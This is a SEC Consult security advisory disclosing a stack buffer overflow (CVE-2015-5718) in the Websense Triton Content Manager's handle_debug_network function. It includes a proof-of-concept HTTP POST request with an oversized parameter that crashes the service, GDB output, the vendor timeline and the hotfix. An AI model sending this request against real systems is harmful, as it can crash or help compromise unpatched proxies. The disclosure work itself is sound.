Stack buffer overflow in handle_debug_network

SEC Consult Vulnerability Lab Security Advisory < 20150805-0 >

=======================================================================

title: Stack buffer overflow in handle_debug_network

product: Websense Triton Content Manager

vulnerable version: 8.0.0 build 1165

fixed version: V8.0.0 HF02

CVE number: CVE-2015-5718

impact: high

homepage: www.websense.com

found: 2015-04-13

by: C. Schwarz (Office Bangkok)

SEC Consult Vulnerability Lab

 

An integrated part of SEC Consult

Berlin - Frankfurt/Main - Montreal - Singapore

Vienna (HQ) - Vilnius - Zurich

 

www.sec-consult.com

=======================================================================

 

Vendor description:

-------------------

Websense Content Gateway (Content Gateway) is a Linux-based, high-performance Web

proxy and cache that provides real-time content scanning and Web site classification

to protect network computers from malicious Web content while controlling employee

access to dynamic, user-generated Web 2.0 content. Web content has evolved from a

static information source to a sophisticated platform for 2-way communications,

which can be a valuable productivity tool when adequately secured.

 

URL: www.websense.com/content/support/library/deployctr/v76/dic_wcg.aspx

 

 

Business recommendation:

------------------------

Attackers are able to completely compromise the Websense Content Manager with

combined targeted attack vectors.

 

The scope of the test, where the vulnerabilities have been identified, was a

very short crash-test of the application. It is assumed that further

vulnerabilities exist within this product.

 

 

Vulnerability overview/description:

-----------------------------------

A stack-based buffer overflow was identified in the Websense Content Manager

administrative interface, which allows to write past the 512 bytes sized buffer

"dest" when calling "strcpy" in "handle_debug_network". The vulnerability can be

used in combination with a CSRF attack to crash the system or execute arbitrary

code.

 

 

Proof of concept:

-----------------

A single HTTP request is sufficient to crash the content_manager binary application:

 

POST /submit_net_debug.cgi?mode=0&menu=0&item=4&tab=1 HTTP/1.1

Host: <content gateway>:8081

[...]

Content-Length: 869

 

record_version=10479%3A70&submit_from_page=%2Fmonitor%2Fm_net_debug.ink&cmd_name=1&cmd_param=[Ax2048]&cmd_status=0&troute_install=0&tdump_install=0&cmd_action=1&cate=ping&cate=asd&apply=apply

 

Below is the GDB output of the process memory, most of the CPU's registers including

the stack pointer of various previous frames are overwritten with the value of 'A'.

 

Program received signal SIGSEGV, Segmentation fault.

[Switching to Thread 0x7f122b073700 (LWP 50174)]
0x00000000006becb1 in handle_debug_network (whc=<value optimized out>, tag=<value optimized out>, arg=<value optimized out>) at /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc:997
997	/home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc: No such file or directory.
	in /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc
(gdb) i r
rax            0x0	0
rbx            0x4141414141414141	4702111234474983745
rcx            0x125c0	75200
rdx            0xda3f	55871
rsi            0x3541360	55841632
rdi            0x1	1
rbp            0x4141414141414141	0x4141414141414141
rsp            0x7f122b070618	0x7f122b070618
r8             0x4141414141414141	4702111234474983745
r9             0x4141414141414141	4702111234474983745
r10            0x4141414141414141	4702111234474983745
r11            0x3f2c35a350	271324652368
r12            0x4141414141414141	4702111234474983745
r13            0x4141414141414141	4702111234474983745
r14            0x4141414141414141	4702111234474983745
r15            0x4141414141414141	4702111234474983745
rip            0x6becb1	0x6becb1 <handle_debug_network(WebHttpContext*, char const*, char*)+561>
eflags         0x10206	[ PF IF RF ]
cs             0x33	51
ss             0x2b	43
ds             0x0	0
es             0x0	0
fs             0x0	0
gs             0x0	0
(gdb) bt
#0  0x00000000006becb1 in handle_debug_network (whc=<value optimized out>, tag=<value optimized out>, arg=<value optimized out>) at /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc:997
#1  0x4141414141414141 in ?? ()
#2  0x4141414141414141 in ?? ()
#3  0x4141414141414141 in ?? ()
#4  0x4141414141414141 in ?? ()
#5  0x4141414141414141 in ?? ()
#6  0x4141414141414141 in ?? ()
#7  0x4141414141414141 in ?? ()
#8  0x4141414141414141 in ?? ()
#9  0x4141414141414141 in ?? ()
#10 0x4141414141414141 in ?? ()
#11 0x4141414141414141 in ?? ()
#12 0x4141414141414141 in ?? ()
#13 0x4141414141414141 in ?? ()
#14 0x4141414141414141 in ?? ()
#15 0x4141414141414141 in ?? ()
#16 0x4141414141414141 in ?? ()
#17 0x0000000000000000 in ?? ()
(gdb)

 

 

Vulnerable / tested versions:

-----------------------------

Websense Triton Content Manager 8.0.0 build 1165

 

 

Vendor contact timeline:

------------------------

2015-05-18: Contacting vendor

2015-06-02: established secure communication channel

2015-06-03: sending advisory draft

2015-06-24: requesting update from vendor

2015-07-16: requesting update from vendor

2015-07-20: requesting update from vendor

2015-07-24: Websense states that hotfix V8.0.0 HF02 was released on 2015-06-10

2015-08-05: Public advisory release

 

 

Solution:

---------

The vulnerability has beed fixed in hotfix V8.0.0 HF02.

www.websense.com/support/article/kbarticle/v8-0-0-About-Hotfix-02-for-Websense-Content-Gateway

 

 

Workaround:

-----------

No workaround available.

 

 

Advisory URL:

-------------

www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

SEC Consult Vulnerability Lab

 

SEC Consult

Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich

 

About SEC Consult Vulnerability Lab

The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It

ensures the continued knowledge gain of SEC Consult in the field of network

and application security to stay ahead of the attacker. The SEC Consult

Vulnerability Lab supports high-quality penetration testing and the evaluation

of new offensive and defensive technologies for our customers. Hence our

customers obtain the most current information about vulnerabilities and valid

recommendation about the risk profile of new technologies.

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Interested to work with the experts of SEC Consult?

Send us your application www.sec-consult.com/career/

 

Interested in improving your cyber security with the experts of SEC Consult?

Contact our local offices www.sec-consult.com/contact/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

Mail: research at sec-consult dot com

Web: www.sec-consult.com

Blog: blog.sec-consult.com

Twitter: twitter.com/sec_consult

 

EOF Christoph Schwarz / @2015

Back